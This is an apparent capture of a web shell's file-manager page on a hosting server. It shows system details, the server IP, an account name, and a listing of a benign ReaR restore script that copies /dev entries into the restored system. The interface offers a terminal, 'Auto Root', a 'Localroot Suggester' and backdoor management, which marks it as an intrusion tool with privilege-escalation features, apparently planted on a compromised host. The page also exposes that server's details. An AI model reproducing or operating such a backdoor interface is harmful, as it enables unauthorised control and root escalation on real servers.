Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.44
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
restore /
Fedora /
Delete
Unzip
Name
Size
Permission
Date
Action
050_copy_dev_files.sh
357
B
-rw-r--r--
2026-04-01 09:39
Save
Rename
# CentOS uses udev with a tmpfs mounted on /dev # Most backup software thus fails to backup /dev # Therefore /dev stays empty after the restore, which prevents us from installing the boot loader # # The solution is to copy a rudimentary set of /dev entries into the restored system # We take these from the rescue system. cp -a /dev/. $TARGET_FS_ROOT/dev/